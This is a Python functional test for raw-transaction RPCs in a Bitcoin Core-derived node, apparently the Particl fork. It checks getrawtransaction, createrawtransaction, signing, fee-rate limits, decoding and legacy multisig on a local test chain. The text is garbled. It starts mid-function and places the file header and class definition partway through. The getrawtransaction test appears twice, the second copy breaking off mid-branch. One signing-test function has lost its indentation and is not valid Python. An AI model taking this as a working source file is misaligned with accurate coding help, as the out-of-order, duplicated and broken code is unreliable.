    rawTx = self.nodes[1].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): 9.999})
    rawTxSigned = self.nodes[1].signrawtransactionwithwallet(rawTx)
    txId = self.nodes[1].sendrawtransaction(rawTxSigned['hex'])
    self.generate(self.nodes[0], 1)
    self.sync_all()
    # node0 runs with -txindex, node3 without.
    for n in [0, 3]:
        self.log.info(f"Test getrawtransaction {'with' if n == 0 else 'without'} -txindex")
        # 1. valid parameters - only supply txid
        assert_equal(self.nodes[n].getrawtransaction(txId), rawTxSigned['hex'])
        # 2. valid parameters - supply txid and 0 for non-verbose
        assert_equal(self.nodes[n].getrawtransaction(txId, 0), rawTxSigned['hex'])
        # 3. valid parameters - supply txid and False for non-verbose
        assert_equal(self.nodes[n].getrawtransaction(txId, False), rawTxSigned['hex'])
        # 4. valid parameters - supply txid and 1 for verbose.
        # We only check the "hex" field of the output so we don't need to update this test every time the output format changes.
        assert_equal(self.nodes[n].getrawtransaction(txId, 1)["hex"], rawTxSigned['hex'])
        # 5. valid parameters - supply txid and True for non-verbose
        assert_equal(self.nodes[n].getrawtransaction(txId, True)["hex"], rawTxSigned['hex'])
        # 6. invalid parameters - supply txid and invalid boolean values (strings) for verbose
        for value in ["True", "False"]:
            assert_raises_rpc_error(-1, "not a boolean", self.nodes[n].getrawtransaction, txid=txId, verbose=value)
        # 7. invalid parameters - supply txid and empty array
        assert_raises_rpc_error(-1, "not a boolean", self.nodes[n].getrawtransaction, txId, [])
        # 8. invalid parameters - supply txid and empty dict
        assert_raises_rpc_error(-1, "not a boolean", self.nodes[n].getrawtransaction, txId, {})
    # Make a tx by sending, then generate 2 blocks; block1 has the tx in it
    tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress(), 1)
    block1, block2 = self.generate(self.nodes[2], 2)
    self.sync_all()
    for n in [0, 3]:
        self.log.info(f"Test getrawtransaction {'with' if n == 0 else 'without'} -txindex, with blockhash")
        # We should be able to get the raw transaction by providing the correct block
        gottx = self.nodes[n].getrawtransaction(txid=tx, verbose=True, blockhash=block1)
        assert_equal(gottx['txid'], tx)
        assert_equal(gottx['in_active_chain'], True)
        if n == 0:
            self.log.info("Test getrawtransaction with -txindex, without blockhash: 'in_active_chain' should be absent")
            gottx = self.nodes[n].getrawtransaction(txid=tx, verbose=True)
            assert_equal(gottx['txid'], tx)
            assert 'in_active_chain' not in gottx
        else:
            self.log.info("Test getrawtransaction without -txindex, without blockhash: expect the call to raise")
            err_msg = (
                "No such mempool transaction. Use -txindex or provide a block hash to enable"
                " blockchain transaction queries. Use gettransaction for wallet transactions."
            )
            assert_raises_rpc_error(-5, err_msg, self.nodes[n].getrawtransaction, txid=tx, verbose=True)
        # We should not get the tx if we provide an unrelated block
        assert_raises_rpc_error(-5, "No such transaction found", self.nodes[n].getrawtransaction, txid=tx, blockhash=block2)
        # An invalid block hash should raise the correct errors
        assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[n].getrawtransaction, txid=tx, blockhash=True)
        assert_raises_rpc_error(-8, "parameter 3 must be of length 64 (not 6, for 'foobar')", self.nodes[n].getrawtransaction, txid=tx, blockhash="foobar")
        assert_raises_rpc_error(-8, "parameter 3 must be of length 64 (not 8, for 'abcd1234')", self.nodes[n].getrawtransaction, txid=tx, blockhash="abcd1234")
        foo = "ZZZ0000000000000000000000000000000000000000000000000000000000000"
        assert_raises_rpc_error(-8, f"parameter 3 must be hexadecimal string (not '{foo}')", self.nodes[n].getrawtransaction, txid=tx, blockhash=foo)
        bar = "0000000000000000000000000000000000000000000000000000000000000000"
        assert_raises_rpc_error(-5, "Block hash not found", self.nodes[n].getrawtransaction, txid=tx, blockhash=bar)
        # Undo the blocks and verify that "in_active_chain" is false.
        self.nodes[n].invalidateblock(block1)
        gottx = self.nodes[n].getrawtransaction(txid=tx, verbose=True, blockhash=block1)
        assert_equal(gottx['in_active_chain'], False)
        self.nodes[n].reconsiderblock(block1)
        assert_equal(self.nodes[n].getbestblockhash(), block2)
    self.log.info("Test getrawtransaction on genesis block coinbase returns an error")
    block = self.nodes[0].getblock(self.nodes[0].getblockhash(0))
    assert_raises_rpc_error(-5, "The genesis block coinbase is not considered an ordinary transaction", self.nodes[0].getrawtransaction, block['merkleroot'])
def createrawtransaction_tests(self):
    """Exercise createrawtransaction argument validation (inputs, outputs,
    sequence, locktime, replaceable) and its array/object output forms."""
    self.log.info("Test createrawtransaction")
    # Test `createrawtransaction` required parameters
    assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction)
    assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [])
    # Test `createrawtransaction` invalid extra parameters
    assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [], {}, 0, False, 'foo')
    # Test `createrawtransaction` invalid `inputs`
    assert_raises_rpc_error(-3, "Expected type array", self.nodes[0].createrawtransaction, 'foo', {})
    assert_raises_rpc_error(-1, "JSON value is not an object as expected", self.nodes[0].createrawtransaction, ['foo'], {})
    assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].createrawtransaction, [{}], {})
    assert_raises_rpc_error(-8, "txid must be of length 64 (not 3, for 'foo')", self.nodes[0].createrawtransaction, [{'txid': 'foo'}], {})
    txid = "ZZZ7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844"
    assert_raises_rpc_error(-8, f"txid must be hexadecimal string (not '{txid}')", self.nodes[0].createrawtransaction, [{'txid': txid}], {})
    assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': TXID}], {})
    assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': TXID, 'vout': 'foo'}], {})
    assert_raises_rpc_error(-8, "Invalid parameter, vout cannot be negative", self.nodes[0].createrawtransaction, [{'txid': TXID, 'vout': -1}], {})
    # sequence number out of range
    for invalid_seq in [-1, 4294967296]:
        inputs = [{'txid': TXID, 'vout': 1, 'sequence': invalid_seq}]
        outputs = {self.nodes[0].getnewaddress(): 1}
        assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range',
                                self.nodes[0].createrawtransaction, inputs, outputs)
    # with valid sequence number
    for valid_seq in [1000, 4294967294]:
        inputs = [{'txid': TXID, 'vout': 1, 'sequence': valid_seq}]
        outputs = {self.nodes[0].getnewaddress(): 1}
        rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
        decrawtx = self.nodes[0].decoderawtransaction(rawtx)
        assert_equal(decrawtx['vin'][0]['sequence'], valid_seq)
    # Test `createrawtransaction` invalid `outputs`
    address = self.nodes[0].getnewaddress()
    address2 = self.nodes[0].getnewaddress()
    assert_raises_rpc_error(-1, "JSON value is not an array as expected", self.nodes[0].createrawtransaction, [], 'foo')
    self.nodes[0].createrawtransaction(inputs=[], outputs={})  # Should not throw for backwards compatibility
    self.nodes[0].createrawtransaction(inputs=[], outputs=[])
    assert_raises_rpc_error(-8, "Data must be hexadecimal string", self.nodes[0].createrawtransaction, [], {'data': 'foo'})
    assert_raises_rpc_error(-5, "Invalid Particl address", self.nodes[0].createrawtransaction, [], {'foo': 0})
    assert_raises_rpc_error(-3, "Invalid amount", self.nodes[0].createrawtransaction, [], {address: 'foo'})
    assert_raises_rpc_error(-3, "Amount out of range", self.nodes[0].createrawtransaction, [], {address: -1})
    assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], multidict([(address, 1), (address, 1)]))
    assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], [{address: 1}, {address: 1}])
    assert_raises_rpc_error(-8, "Invalid parameter, duplicate key: data", self.nodes[0].createrawtransaction, [], [{"data": 'aa'}, {"data": "bb"}])
    assert_raises_rpc_error(-8, "Invalid parameter, duplicate key: data", self.nodes[0].createrawtransaction, [], multidict([("data", 'aa'), ("data", "bb")]))
    assert_raises_rpc_error(-8, "Invalid parameter, key-value pair must contain exactly one key", self.nodes[0].createrawtransaction, [], [{'a': 1, 'b': 2}])
    assert_raises_rpc_error(-8, "Invalid parameter, key-value pair not an object as expected", self.nodes[0].createrawtransaction, [], [['key-value pair1'], ['2']])
    # Test `createrawtransaction` invalid `locktime`
    assert_raises_rpc_error(-3, "Expected type number", self.nodes[0].createrawtransaction, [], {}, 'foo')
    assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, -1)
    assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, 4294967296)
    # Test `createrawtransaction` invalid `replaceable`
    assert_raises_rpc_error(-3, "Expected type bool", self.nodes[0].createrawtransaction, [], {}, 0, 'foo')
    # Test that createrawtransaction accepts an array and object as outputs
    # One output
    tx = tx_from_hex(self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs={address: 99}))
    assert_equal(len(tx.vout), 1)
    assert_equal(
        tx.serialize().hex(),
        self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=[{address: 99}]),
    )
    # Two outputs
    tx = tx_from_hex(self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=OrderedDict([(address, 99), (address2, 99)])))
    assert_equal(len(tx.vout), 2)
    assert_equal(
        tx.serialize().hex(),
        self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=[{address: 99}, {address2: 99}]),
    )
    # Multiple mixed outputs
    tx = tx_from_hex(self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=multidict([(address, 99), (address2, 99), ('data', '99')])))
    assert_equal(len(tx.vout), 3)
    assert_equal(
        tx.serialize().hex(),
        self.nodes[2].createrawtransaction(inputs=[{'txid': TXID, 'vout': 9}], outputs=[{address: 99}, {address2: 99}, {'data': '99'}]),
    )
def signrawtransactionwithwallet_tests(self):
for type in ["bech32", "p2sh-segwit", "legacy"]:
self.log.info(f"Test signrawtransactionwithwallet with missing prevtx info ({type})")
addr = self.nodes[0].getnewaddress("", type)
addrinfo = self.nodes[0].getaddressinfo(addr)
pubkey = addrinfo["scriptPubKey"]
inputs = [{'txid': TXID, 'vout': 3, 'sequence': 1000}]
outputs = {self.nodes[0].getnewaddress(): 1}
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
prevtx = dict(txid=TXID, scriptPubKey=pubkey, vout=3, amount=1)
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ["complete"]
if type == "legacy":
del prevtx["amount"]
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ["complete"]
else:
assert_raises_rpc_error(-3, "Missing amount", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": TXID,
"scriptPubKey": pubkey,
"vout": 3,
}
])
assert_raises_rpc_error(-3, "Missing vout", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": TXID,
"scriptPubKey": pubkey,
"amount": 1,
}
])
assert_raises_rpc_error(-3, "Missing txid", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"scriptPubKey": pubkey,
"vout": 3,
"amount": 1,
}
])
assert_raises_rpc_error(-3, "Missing scriptPubKey", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": TXID,
"vout": 3,
"amount": 1
}
])
def sendrawtransaction_tests(self):
    """Broadcasting a transaction that spends a nonexistent input must fail."""
    self.log.info("Test sendrawtransaction with missing input")
    # TXID does not correspond to any transaction on this chain.
    missing_input = [{'txid': TXID, 'vout': 1}]
    destination = {self.nodes[0].getnewaddress(): 4.998}
    unsigned = self.nodes[2].createrawtransaction(missing_input, destination)
    signed = self.nodes[2].signrawtransactionwithwallet(unsigned)
    assert_raises_rpc_error(-25, "bad-txns-inputs-missingorspent", self.nodes[2].sendrawtransaction, signed['hex'])
def sendrawtransaction_testmempoolaccept_tests(self):
    """Check maxfeerate handling in sendrawtransaction/testmempoolaccept,
    and rejection of a transaction that is already in the chain."""
    self.log.info("Test sendrawtransaction/testmempoolaccept with maxfeerate")
    fee_exceeds_max = "Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)"
    # Test a transaction with a small fee.
    txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
    rawTx = self.nodes[0].getrawtransaction(txId, True)
    vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
    self.sync_all()
    inputs = [{"txid": txId, "vout": vout['n']}]
    # Fee 10,000 satoshis, (1 - (10000 sat * 0.00000001 BTC/sat)) = 0.9999
    outputs = {self.nodes[0].getnewaddress(): Decimal("0.99990000")}
    rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
    rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
    assert_equal(rawTxSigned['complete'], True)
    # Fee 10,000 satoshis, ~100 b transaction, fee rate should land around 100 sat/byte = 0.00100000 BTC/kB
    # Thus, testmempoolaccept should reject
    testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']], 0.00001000)[0]
    assert_equal(testres['allowed'], False)
    assert_equal(testres['reject-reason'], 'max-fee-exceeded')
    # and sendrawtransaction should throw
    assert_raises_rpc_error(-25, fee_exceeds_max, self.nodes[2].sendrawtransaction, rawTxSigned['hex'], 0.00001000)
    # and the following calls should both succeed
    testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']])[0]
    assert_equal(testres['allowed'], True)
    self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'])
    # Test a transaction with a large fee.
    txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
    rawTx = self.nodes[0].getrawtransaction(txId, True)
    vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
    self.sync_all()
    inputs = [{"txid": txId, "vout": vout['n']}]
    # Fee 2,000,000 satoshis, (1 - (2000000 sat * 0.00000001 BTC/sat)) = 0.98
    outputs = {self.nodes[0].getnewaddress() : Decimal("0.98000000")}
    rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
    rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
    assert_equal(rawTxSigned['complete'], True)
    # Fee 2,000,000 satoshis, ~100 b transaction, fee rate should land around 20,000 sat/byte = 0.20000000 BTC/kB
    # Thus, testmempoolaccept should reject
    testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']])[0]
    assert_equal(testres['allowed'], False)
    assert_equal(testres['reject-reason'], 'max-fee-exceeded')
    # and sendrawtransaction should throw
    assert_raises_rpc_error(-25, fee_exceeds_max, self.nodes[2].sendrawtransaction, rawTxSigned['hex'])
    # and the following calls should both succeed
    testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']], maxfeerate='0.20000000')[0]
    assert_equal(testres['allowed'], True)
    self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'], maxfeerate='0.20000000')
    self.log.info("Test sendrawtransaction/testmempoolaccept with tx already in the chain")
    self.generate(self.nodes[2], 1)
    self.sync_blocks()
    for node in self.nodes:
        testres = node.testmempoolaccept([rawTxSigned['hex']])[0]
        assert_equal(testres['allowed'], False)
        assert_equal(testres['reject-reason'], 'txn-already-known')
        assert_raises_rpc_error(-27, 'Transaction already in block chain', node.sendrawtransaction, rawTxSigned['hex'])
def decoderawtransaction_tests(self):
    """Decode witness and non-witness serializations, including a tx whose
    encoding is ambiguous between the two."""
    self.log.info("Test decoderawtransaction")
    # witness transaction
    encrawtx = "010000000001010000000000000072c1a6a246ae63f74f931e8365e15a089c68d61900000000000000000000ffffffff0100e1f50500000000000102616100000000"
    decrawtx = self.nodes[0].decoderawtransaction(encrawtx, True)  # decode as witness transaction
    assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
    assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False)  # force decode as non-witness transaction
    # non-witness transaction
    encrawtx = "01000000010000000000000072c1a6a246ae63f74f931e8365e15a089c68d61900000000000000000000ffffffff0100e1f505000000000000000000"
    decrawtx = self.nodes[0].decoderawtransaction(encrawtx, False)  # decode as non-witness transaction
    assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
    # known ambiguous transaction in the chain (see https://github.com/bitcoin/bitcoin/issues/20579)
    coinbase = "03c68708046ff8415c622f4254432e434f4d2ffabe6d6de1965d02c68f928e5b244ab1965115a36f56eb997633c7f690124bbf43644e23080000000ca3d3af6d005a65ff0200fd00000000"
    encrawtx = f"020000000001010000000000000000000000000000000000000000000000000000000000000000ffffffff4b{coinbase}" \
               "ffffffff03f4c1fb4b0000000016001497cfc76442fe717f2a3f0cc9c175f7561b6619970000000000000000266a24aa21a9ed957d1036a80343e0d1b659497e1b48a38ebe876a056d45965fac4a85cda84e1900000000000000002952534b424c4f434b3a8e092581ab01986cbadc84f4b43f4fa4bb9e7a2e2a0caf9b7cf64d939028e22c0120000000000000000000000000000000000000000000000000000000000000000000000000"
    decrawtx = self.nodes[0].decoderawtransaction(encrawtx)
    decrawtx_wit = self.nodes[0].decoderawtransaction(encrawtx, True)
    assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False)  # fails to decode as non-witness transaction
    assert_equal(decrawtx, decrawtx_wit)  # the witness interpretation should be chosen
    assert_equal(decrawtx['vin'][0]['coinbase'], coinbase)
def transaction_version_number_tests(self):
    """Check decoding of boundary nVersion values (signed to unsigned wrap).

    The max-version case is disabled below (kept as a bare string) because it
    collides with this fork's (Particl) own transaction versioning.
    """
    self.log.info("Test transaction version numbers")
    # Test the minimum transaction version number that fits in a signed 32-bit integer.
    # As transaction version is unsigned, this should convert to its unsigned equivalent.
    tx = CTransaction()
    tx.nVersion = -0x80000000
    rawtx = tx.serialize().hex()
    decrawtx = self.nodes[0].decoderawtransaction(rawtx)
    assert_equal(decrawtx['version'], 0x80000000)
    """
    # Removed as collides with particl version
    # Test the maximum transaction version number that fits in a signed 32-bit integer.
    tx = CTransaction()
    tx.nVersion = 0x7fffffff
    rawtx = tx.serialize().hex()
    decrawtx = self.nodes[0].decoderawtransaction(rawtx)
    assert_equal(decrawtx['version'], 0x7fffffff)
    """
def raw_multisig_transaction_legacy_tests(self):
    """Legacy-wallet multisig flows: 2of2 funding, 2of3 cross-node spending,
    and 2of2 partial-sign + combinerawtransaction."""
    self.log.info("Test raw multisig transactions (legacy)")
    # The traditional multisig workflow does not work with descriptor wallets so these are legacy only.
    # The multisig workflow with descriptor wallets uses PSBTs and is tested elsewhere, no need to do them here.
    # 2of2 test
    addr1 = self.nodes[2].getnewaddress()
    addr2 = self.nodes[2].getnewaddress()
    addr1Obj = self.nodes[2].getaddressinfo(addr1)
    addr2Obj = self.nodes[2].getaddressinfo(addr2)
    # Tests for createmultisig and addmultisigaddress
    assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 1, ["01020304"])
    # createmultisig can only take public keys
    self.nodes[0].createmultisig(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])
    # addmultisigaddress can take both pubkeys and addresses so long as they are in the wallet, which is tested here
    assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 2, [addr1Obj['pubkey'], addr1])
    mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr1])['address']
    # use balance deltas instead of absolute values
    bal = self.nodes[2].getbalance()
    # send 1.2 BTC to msig adr
    txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
    self.sync_all()
    self.generate(self.nodes[0], 1)
    self.sync_all()
    # node2 has both keys of the 2of2 ms addr, tx should affect the balance
    assert_equal(self.nodes[2].getbalance(), bal + Decimal('1.20000000'))
    # 2of3 test from different nodes
    bal = self.nodes[2].getbalance()
    addr1 = self.nodes[1].getnewaddress()
    addr2 = self.nodes[2].getnewaddress()
    addr3 = self.nodes[2].getnewaddress()
    addr1Obj = self.nodes[1].getaddressinfo(addr1)
    addr2Obj = self.nodes[2].getaddressinfo(addr2)
    addr3Obj = self.nodes[2].getaddressinfo(addr3)
    mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey']])['address']
    txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
    decTx = self.nodes[0].gettransaction(txId)
    rawTx = self.nodes[0].decoderawtransaction(decTx['hex'])
    self.sync_all()
    self.generate(self.nodes[0], 1)
    self.sync_all()
    # THIS IS AN INCOMPLETE FEATURE
    # NODE2 HAS TWO OF THREE KEYS AND THE FUNDS SHOULD BE SPENDABLE AND COUNT AT BALANCE CALCULATION
    assert_equal(self.nodes[2].getbalance(), bal)  # for now, assume the funds of a 2of3 multisig tx are not marked as spendable
    txDetails = self.nodes[0].gettransaction(txId, True)
    rawTx = self.nodes[0].decoderawtransaction(txDetails['hex'])
    vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('2.20000000'))
    bal = self.nodes[0].getbalance()
    inputs = [{"txid": txId, "vout": vout['n'], "scriptPubKey": vout['scriptPubKey']['hex'], "amount": vout['value']}]
    outputs = {self.nodes[0].getnewaddress(): 2.19}
    rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
    rawTxPartialSigned = self.nodes[1].signrawtransactionwithwallet(rawTx, inputs)
    assert_equal(rawTxPartialSigned['complete'], False)  # node1 only has one key, can't comp. sign the tx
    rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx, inputs)
    assert_equal(rawTxSigned['complete'], True)  # node2 can sign the tx compl., own two of three keys
    self.nodes[2].sendrawtransaction(rawTxSigned['hex'])
    rawTx = self.nodes[0].decoderawtransaction(rawTxSigned['hex'])
    self.sync_all()
    self.generate(self.nodes[0], 1)
    self.sync_all()
    assert_equal(self.nodes[0].getbalance(), bal + Decimal('50.00000000') + Decimal('2.19000000'))  # block reward + tx
    # 2of2 test for combining transactions
    bal = self.nodes[2].getbalance()
    addr1 = self.nodes[1].getnewaddress()
    addr2 = self.nodes[2].getnewaddress()
    addr1Obj = self.nodes[1].getaddressinfo(addr1)
    addr2Obj = self.nodes[2].getaddressinfo(addr2)
    self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
    mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
    mSigObjValid = self.nodes[2].getaddressinfo(mSigObj)
    txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
    decTx = self.nodes[0].gettransaction(txId)
    rawTx2 = self.nodes[0].decoderawtransaction(decTx['hex'])
    self.sync_all()
    self.generate(self.nodes[0], 1)
    self.sync_all()
    assert_equal(self.nodes[2].getbalance(), bal)  # the funds of a 2of2 multisig tx should not be marked as spendable
    txDetails = self.nodes[0].gettransaction(txId, True)
    rawTx2 = self.nodes[0].decoderawtransaction(txDetails['hex'])
    vout = next(o for o in rawTx2['vout'] if o['value'] == Decimal('2.20000000'))
    bal = self.nodes[0].getbalance()
    inputs = [{"txid": txId, "vout": vout['n'], "scriptPubKey": vout['scriptPubKey']['hex'], "redeemScript": mSigObjValid['hex'], "amount": vout['value']}]
    outputs = {self.nodes[0].getnewaddress(): 2.19}
    rawTx2 = self.nodes[2].createrawtransaction(inputs, outputs)
    rawTxPartialSigned1 = self.nodes[1].signrawtransactionwithwallet(rawTx2, inputs)
    self.log.debug(rawTxPartialSigned1)
    assert_equal(rawTxPartialSigned1['complete'], False)  # node1 only has one key, can't comp. sign the tx
    rawTxPartialSigned2 = self.nodes[2].signrawtransactionwithwallet(rawTx2, inputs)
    self.log.debug(rawTxPartialSigned2)
    assert_equal(rawTxPartialSigned2['complete'], False)  # node2 only has one key, can't comp. sign the tx
    rawTxComb = self.nodes[2].combinerawtransaction([rawTxPartialSigned1['hex'], rawTxPartialSigned2['hex']])
    self.log.debug(rawTxComb)
    self.nodes[2].sendrawtransaction(rawTxComb)
    rawTx2 = self.nodes[0].decoderawtransaction(rawTxComb)
    self.sync_all()
    self.generate(self.nodes[0], 1)
    self.sync_all()
    assert_equal(self.nodes[0].getbalance(), bal + Decimal('50.00000000') + Decimal('2.19000000'))  # block reward + tx
# Script entry point: run the functional test when invoked directly.
if __name__ == '__main__':
    RawTransactionsTest().main()
#!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the rawtransaction RPCs.
Test the following RPCs:
- getrawtransaction
- createrawtransaction
- signrawtransactionwithwallet
- sendrawtransaction
- decoderawtransaction
"""
from collections import OrderedDict
from decimal import Decimal
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.messages import (
CTransaction,
tx_from_hex,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
find_vout_for_address,
)
# Arbitrary 64-hex-digit transaction id: used wherever only a syntactically valid txid is needed.
TXID = "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000"
class multidict(dict):
    """Dict subclass whose items() re-emits duplicate keys.

    Constructed from a list of (key, value) tuples. Since the json module
    serializes via items(), repeated keys survive into (invalid) JSON, eg:
    >>> json.dumps(multidict([(1, 2), (1, 2)]))
    '{"1": 2, "1": 2}'
    Used to test calls to rpc methods with repeated keys in the json object."""
    def __init__(self, x):
        super().__init__(x)
        self.x = x

    def items(self):
        # Return the raw pair list rather than the deduplicated dict view.
        return self.x
class RawTransactionsTest(BitcoinTestFramework):
def set_test_params(self):
    """Configure a fresh 4-node chain; nodes 0-2 run with -txindex."""
    self.setup_clean_chain = True
    self.num_nodes = 4
    self.extra_args = [
        ["-txindex"],
        ["-txindex"],
        ["-txindex"],
        [],
    ]
    # whitelist all peers to speed up tx relay / mempool sync
    for args in self.extra_args:
        args.append("-whitelist=noban@127.0.0.1")
    self.supports_cli = False
def skip_test_if_missing_module(self):
    """Skip the whole test when the build has no wallet support."""
    self.skip_if_no_wallet()
def setup_network(self):
    """Build the default topology, then additionally connect node0 to node2."""
    super().setup_network()
    self.connect_nodes(0, 2)
def run_test(self):
    """Fund the nodes, then run each *rawtransaction RPC test group in order."""
    self.log.info("Prepare some coins for multiple *rawtransaction commands")
    self.generate(self.nodes[2], 1)
    self.sync_all()
    # Mature node0's coinbase so it has spendable funds.
    self.generate(self.nodes[0], COINBASE_MATURITY + 1)
    self.sync_all()
    for amount in [1.5, 1.0, 5.0]:
        self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), amount)
    self.sync_all()
    self.generate(self.nodes[0], 5)
    self.sync_all()
    self.getrawtransaction_tests()
    self.createrawtransaction_tests()
    self.signrawtransactionwithwallet_tests()
    self.sendrawtransaction_tests()
    self.sendrawtransaction_testmempoolaccept_tests()
    self.decoderawtransaction_tests()
    self.transaction_version_number_tests()
    # The traditional multisig flow is incompatible with descriptor wallets.
    if not self.options.descriptors:
        self.raw_multisig_transaction_legacy_tests()
def getrawtransaction_tests(self):
    """Exercise getrawtransaction: verbosity arguments, blockhash-based
    lookups with and without -txindex, and the genesis-coinbase error."""
    addr = self.nodes[1].getnewaddress()
    txid = self.nodes[0].sendtoaddress(addr, 10)
    self.generate(self.nodes[0], 1)
    self.sync_all()
    vout = find_vout_for_address(self.nodes[1], txid, addr)
    rawTx = self.nodes[1].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): 9.999})
    rawTxSigned = self.nodes[1].signrawtransactionwithwallet(rawTx)
    txId = self.nodes[1].sendrawtransaction(rawTxSigned['hex'])
    self.generate(self.nodes[0], 1)
    self.sync_all()
    # node0 runs with -txindex, node3 without.
    for n in [0, 3]:
        self.log.info(f"Test getrawtransaction {'with' if n == 0 else 'without'} -txindex")
        # 1. valid parameters - only supply txid
        assert_equal(self.nodes[n].getrawtransaction(txId), rawTxSigned['hex'])
        # 2. valid parameters - supply txid and 0 for non-verbose
        assert_equal(self.nodes[n].getrawtransaction(txId, 0), rawTxSigned['hex'])
        # 3. valid parameters - supply txid and False for non-verbose
        assert_equal(self.nodes[n].getrawtransaction(txId, False), rawTxSigned['hex'])
        # 4. valid parameters - supply txid and 1 for verbose.
        # We only check the "hex" field of the output so we don't need to update this test every time the output format changes.
        assert_equal(self.nodes[n].getrawtransaction(txId, 1)["hex"], rawTxSigned['hex'])
        # 5. valid parameters - supply txid and True for non-verbose
        assert_equal(self.nodes[n].getrawtransaction(txId, True)["hex"], rawTxSigned['hex'])
        # 6. invalid parameters - supply txid and invalid boolean values (strings) for verbose
        for value in ["True", "False"]:
            assert_raises_rpc_error(-1, "not a boolean", self.nodes[n].getrawtransaction, txid=txId, verbose=value)
        # 7. invalid parameters - supply txid and empty array
        assert_raises_rpc_error(-1, "not a boolean", self.nodes[n].getrawtransaction, txId, [])
        # 8. invalid parameters - supply txid and empty dict
        assert_raises_rpc_error(-1, "not a boolean", self.nodes[n].getrawtransaction, txId, {})
    # Make a tx by sending, then generate 2 blocks; block1 has the tx in it
    tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress(), 1)
    block1, block2 = self.generate(self.nodes[2], 2)
    self.sync_all()
    for n in [0, 3]:
        self.log.info(f"Test getrawtransaction {'with' if n == 0 else 'without'} -txindex, with blockhash")
        # We should be able to get the raw transaction by providing the correct block
        gottx = self.nodes[n].getrawtransaction(txid=tx, verbose=True, blockhash=block1)
        assert_equal(gottx['txid'], tx)
        assert_equal(gottx['in_active_chain'], True)
        if n == 0:
            self.log.info("Test getrawtransaction with -txindex, without blockhash: 'in_active_chain' should be absent")
